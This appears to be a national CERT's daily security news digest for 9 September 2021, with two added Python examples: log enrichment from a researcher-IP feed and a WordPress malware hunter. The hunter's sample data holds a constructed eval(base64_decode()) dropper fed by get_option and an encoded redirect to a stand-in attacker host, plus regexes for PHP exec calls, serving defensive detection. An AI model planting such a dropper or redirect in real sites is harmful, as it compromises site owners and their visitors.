Daily summary - 09.09.2021

End-of-Day report

Timeframe: Wednesday 08-09-2021 18:00 - Thursday 09-09-2021 18:00 Handler: Dimitri Robl Co-Handler: Robert Waldner


Ransomware: Extortion website of the "REvil" gang suddenly back online

The gang whose Kaseya supply-chain attack made headlines had vanished from the scene in mid-July; now its Tor onion leak site is active again.


Fraudulent streaming platforms send unjustified payment demands!

Numerous Internet users searching for Hollywood blockbusters stumble upon websites such as kinox.su, justhdfilme.com or kinox-deutsch.com. Anyone who tries to watch a film on such a site is redirected to further fraudulent websites such as luguplay.de, playnate.de or rubuplay.de. After a supposedly free registration on these sites you cannot watch any film; instead you receive invoices and payment reminders. Under no circumstances should you pay!


Fortinet warns customers after hackers leak passwords for 87,000 VPNs

Networking equipment vendor Fortinet has notified customers today that a cybercriminal gang has assembled a collection of access credentials for more than 87,000 FortiGate SSL-VPN devices. "This incident is related to an old vulnerability resolved in May 2019," the company said in a blog post following an inquiry from The Record sent on Tuesday, when a small portion of this larger list was published on a private cybercrime forum hosted on the dark web, and later on the website of a ransomware gang, [...] Note that applying the 2019 fix closes the hole but does not invalidate credentials that were already harvested from it; any device that ever ran a vulnerable build should have its VPN user passwords reset in addition to being patched.


Microsoft fixes bug letting hackers take over Azure containers

Microsoft has fixed a vulnerability in Azure Container Instances called Azurescape that allowed a malicious container to take over containers belonging to other customers on the platform.


Updates to Our Datafeeds/API, (Thu, Sep 9th)

Most of the data we are collecting is freely available via our API. For quick documentation, see https://isc.sans.edu/api. One particular popular feed is our list of "Researcher IPs." These are IP addresses connected to commercial and academic projects that scan the internet. These scans can account for a large percentage of your unsolicited inbound activity. One use of this feed is to add "color to your logs" by enriching your log data from this feed.
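The enrichment described above, as an added example that is not the ISC's own code: a researcher-IP feed is turned into a prefix index and each web-server log line is tagged with the project that owns the client address, so scanner noise can be counted separately from the unattributed remainder that deserves analyst attention. The feed rows and log lines are constructed for the demonstration, and the `prefix`/`name` field names are an assumption rather than the real feed's schema (see https://isc.sans.edu/api for that).

```python
"""Added example, not the ISC's own code: enrich web-server log lines with a
researcher-IP feed. Feed rows and log lines are constructed; the 'prefix' and
'name' keys are assumed field names, not the real feed's schema."""
import ipaddress
import re
from collections import Counter

# Constructed feed: one prefix and one single address, each with a label.
SAMPLE_FEED = [
    {"prefix": "198.51.100.0/24", "name": "ExampleScanProject"},
    {"prefix": "203.0.113.7", "name": "UniScanner"},
]

# Constructed Apache/nginx combined-format lines, including one with a
# garbage client field to show the parser does not choke on it.
SAMPLE_LOG = """\
203.0.113.7 - - [09/Sep/2021:10:01:02 +0000] "GET /.env HTTP/1.1" 404 153
192.0.2.44 - - [09/Sep/2021:10:01:05 +0000] "POST /wp-login.php HTTP/1.1" 200 2048
198.51.100.23 - - [09/Sep/2021:10:02:11 +0000] "GET / HTTP/1.1" 200 512
not-an-ip - - [09/Sep/2021:10:02:12 +0000] "GET / HTTP/1.1" 400 0
"""

CLIENT_IP = re.compile(r"^(\S+)\s")


def build_index(feed):
    """Parse feed rows into (network, label); a bare address becomes a /32 or /128."""
    return [(ipaddress.ip_network(row["prefix"], strict=False), row["name"])
            for row in feed]


def lookup(index, ip):
    """Return the researcher label for ip, or None if it is unattributed or unparsable."""
    try:
        addr = ipaddress.ip_address(ip)
    except ValueError:
        return None
    for net, name in index:
        if addr.version == net.version and addr in net:
            return name
    return None


def enrich(index, log_text):
    """Return [(client_ip, label_or_None, original_line)] for every log line;
    lines whose first field is not an address are kept and tagged None."""
    out = []
    for line in log_text.splitlines():
        m = CLIENT_IP.match(line)
        ip = m.group(1) if m else ""
        out.append((ip, lookup(index, ip), line))
    return out


def summarize(enriched):
    """Hits per label; 'unattributed' is the traffic that was not a known scanner."""
    return Counter(label or "unattributed" for _, label, _ in enriched)


if __name__ == "__main__":
    idx = build_index(SAMPLE_FEED)
    for ip, label, line in enrich(idx, SAMPLE_LOG):
        print(f"[{label or '-'}] {line}")
    print(summarize(enrich(idx, SAMPLE_LOG)))
```

A linear scan over the index is fine for a feed of a few thousand prefixes; for larger feeds, sort the networks and binary-search, or load them into a radix tree.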


Multistage WordPress Redirect Kit

Recently, one of our analysts @kpetku came across a series of semi-randomised malware injections in multiple WordPress environments. Typical of spam redirect infections, the malware redirects visitors by calling malicious files hosted on third-party infected websites. Interestingly, the infection stores itself as encoded content in the database and is called through random functions littered throughout plugin files using a very common WordPress function, get_option.
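One way to hunt for the pattern described above, as an added example rather than the analysts' own tooling: scan plugin source for functions that both read an option via `get_option()` and hand something to an exec-style call, scan `wp_options` rows for base64 values that decode to PHP-looking bytes, and cross-reference the two. The plugin fragment and option rows below are constructed; the function and option names in them are invented for the demonstration.

```python
"""Added example (not the analysts' tooling): find a payload parked in
wp_options and pulled back with get_option() by a dropper planted in a
plugin file. Sample plugin source and option rows are constructed."""
import base64
import binascii
import re

# Constructed plugin fragment: an invented dropper next to a legitimate
# get_option() call, to show the scanner separates the two.
SAMPLE_PLUGIN = r"""<?php
function wp_get_cache_x91() {
    $o = get_option('_transient_wp_cache_x91');
    if ($o) { eval(base64_decode($o)); }
}
add_action('init', 'wp_get_cache_x91');

function my_plugin_is_enabled() {
    return (bool) get_option('my_plugin_enabled', true);
}
"""

# Constructed wp_options rows as (option_name, option_value).
SAMPLE_OPTIONS = [
    ("siteurl", "https://example.test"),
    ("_transient_wp_cache_x91",
     base64.b64encode(b"header('Location: https://evil.test/');").decode()),
    ("my_plugin_enabled", "1"),
]

# Calls that execute a string as PHP, and markers of PHP inside a decoded blob.
EXEC_CALL = re.compile(r"\b(eval|assert|create_function)\s*\(", re.I)
OPTION_ARG = re.compile(r"get_option\s*\(\s*['\"]([^'\"]+)['\"]", re.I)
PAYLOAD_MARKERS = re.compile(
    rb"<\?php|\beval\s*\(|\bheader\s*\(|base64_decode|\$_(?:GET|POST|COOKIE|REQUEST)")


def php_functions(src):
    """Yield (name, body) per PHP function, matching braces so nested blocks
    inside the body do not end it early."""
    for m in re.finditer(r"\bfunction\s+(\w+)\s*\(", src):
        start = src.find("{", m.end())
        if start < 0:
            continue
        depth = 0
        for j in range(start, len(src)):
            if src[j] == "{":
                depth += 1
            elif src[j] == "}":
                depth -= 1
                if depth == 0:
                    yield m.group(1), src[start:j + 1]
                    break


def flag_functions(src):
    """Map suspicious function name -> option it reads (or None), for every
    function that calls get_option() and also an exec-style call."""
    hits = {}
    for name, body in php_functions(src):
        if "get_option" in body and EXEC_CALL.search(body):
            opt = OPTION_ARG.search(body)
            hits[name] = opt.group(1) if opt else None
    return hits


def flag_options(rows):
    """Option names whose value is strict base64 decoding to PHP-looking bytes.
    Kits also layer str_rot13 or gzinflate on top; extend the decode step if the
    flagged plugin code shows those wrappers."""
    hits = []
    for name, value in rows:
        try:
            raw = base64.b64decode(value, validate=True)
        except (binascii.Error, ValueError):
            continue
        if PAYLOAD_MARKERS.search(raw):
            hits.append(name)
    return hits


def cross_reference(src, rows):
    """Options both read by a flagged function and holding a suspicious value."""
    funcs = flag_functions(src)
    opts = set(flag_options(rows))
    return sorted(o for o in funcs.values() if o in opts)


if __name__ == "__main__":
    print(flag_functions(SAMPLE_PLUGIN))
    print(flag_options(SAMPLE_OPTIONS))
    print(cross_reference(SAMPLE_PLUGIN, SAMPLE_OPTIONS))
```

Run `flag_functions` over every file under `wp-content/plugins` and `flag_options` over a `SELECT option_name, option_value FROM wp_options` dump; a name appearing in `cross_reference` is the option to delete together with the function that reads it, and the third-party hosts named in the decoded payload are the ones to block.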


Get Ready for PYSA Ransomware Attacks Against Linux Systems

Linux is increasingly targeted by ransomware. Researchers have now detected indications that the PYSA ransomware, often also known as Mespinoza, is also being readied for Linux targets.


Analysis of a Parallels Desktop Stack Clash Vulnerability and Variant Hunting using Binary Ninja

Parallels Desktop uses a paravirtual PCI device called the "Parallels ToolGate" for communication between guest and host OS. This device is identified by Vendor ID 0x1AB8 and Device ID 0x4000 in a Parallels guest. The guest driver provided as part of Parallels Tools and the host virtual device communicate using a ToolGate messaging protocol. To provide a summary, the guest driver prepares a message and writes the physical address of the message to [...]


When the Cyberthreat Comes from the Inside

Would you like to earn millions of dollars? The LockBit 2.0 ransomware gang is now trying to recruit insiders, and there is no reason to believe that your company wouldn't be targeted. The global competitive framework has changed significantly: hybrid warfare with methods like infiltration and espionage will be an imminent threat against the strategic environment for the foreseeable future.



OpenVPN for Linux and FreeBSD: vulnerability allows security measures to be bypassed

A remote, anonymous attacker can exploit a vulnerability in OpenVPN on Linux and FreeBSD to cause a denial of service or to bypass security measures.


Cisco Security Advisories

Cisco has published ten security advisories. None of the vulnerabilities fixed in them is rated "critical"; four are rated "high".


ABB: EIBPORT several CVEs ABBVREP0049_R9120

ABB is aware of vulnerabilities in the product versions listed above. A firmware update is available that resolves these privately reported vulnerabilities in the product versions listed above. An attacker who successfully exploited these vulnerabilities could access sensitive information stored inside the device and can access the device with root privileges. CVE-IDs: CVE-2021-28909, CVE-2021-28910, CVE-2021-28911, CVE-2021-28912, CVE-2021-28913, CVE-2021-28914


GitHub discovers seven security vulnerabilities in Node.js packages

As part of a bug-bounty program, GitHub has uncovered vulnerabilities and offers guidance for affected users.


Security updates for Thursday

Security updates have been issued by Fedora (lynx, matrix-synapse, and proftpd), openSUSE (ntfs-3g_ntfsprogs), Oracle (kernel), Red Hat (RHV-H), Scientific Linux (kernel), and Ubuntu (libapache2-mod-auth-mellon, linux, linux-aws, linux-aws-5.11, linux-azure, linux-azure-5.11, linux-gcp, linux-hwe-5.11, linux-kvm, linux-oracle, linux-oracle-5.11, linux-raspi, linux, linux-aws, linux-aws-5.4, linux-azure, linux-azure-5.4, linux-gcp, linux-gcp-5.4, linux-gke, linux-gke-5.4, linux-gkeop, [...]


Intel processor vulnerabilities CVE-2021-0086 and CVE-2021-0089


SaltStack Salt: multiple vulnerabilities


WordPress: multiple vulnerabilities


Security Advisory - Improper Authorization Vulnerability in Some Huawei Products


Security Bulletin: IBM Security Guardium is affected by an Improper Restriction of Excessive Authentication Attempts vulnerability (CVE-2021-20427)


Security Bulletin: Security vulnerability has been fixed in IBM Security Identity Manager (CVE-2021-29692)


Security Bulletin: IBM Security Guardium is affected by an OpenLDAP vulnerability (CVE-2020-25692)


Security Bulletin: Security vulnerabilities have been identified in IBM® Java SDK that affect IBM Security Directory (CVE-2021-2161)


Security Bulletin: Multiple vulnerabilities in IBM Java SDK affect IBM Security Guardium


Security Bulletin: Vulnerability in NX-OS Firmware used by IBM c-type SAN directors and switches.


Security Bulletin: Security vulnerability has been identified in IBM® Java SDK that affects IBM Security Directory Suite (CVE-2021-2161)


Security Bulletin: Container Environment Vulnerabilities Affect IBM Secure Proxy (CVE-2020-14298, CVE-2020-14300)


Security Bulletin: IBM Security Guardium is affected by a kernel vulnerability (CVE-2020-25705, CVE-2020-28374)


Security Bulletin: IBM Security Guardium is affected by a Reliance on Untrusted Inputs in Security Decision vulnerability


Security Bulletin: IBM Security Guardium is affected by a Weak Password Policy vulnerability (CVE-2021-20418)


Security Bulletin: IBM Security Guardium is affected by Oracle MySQL vulnerabilities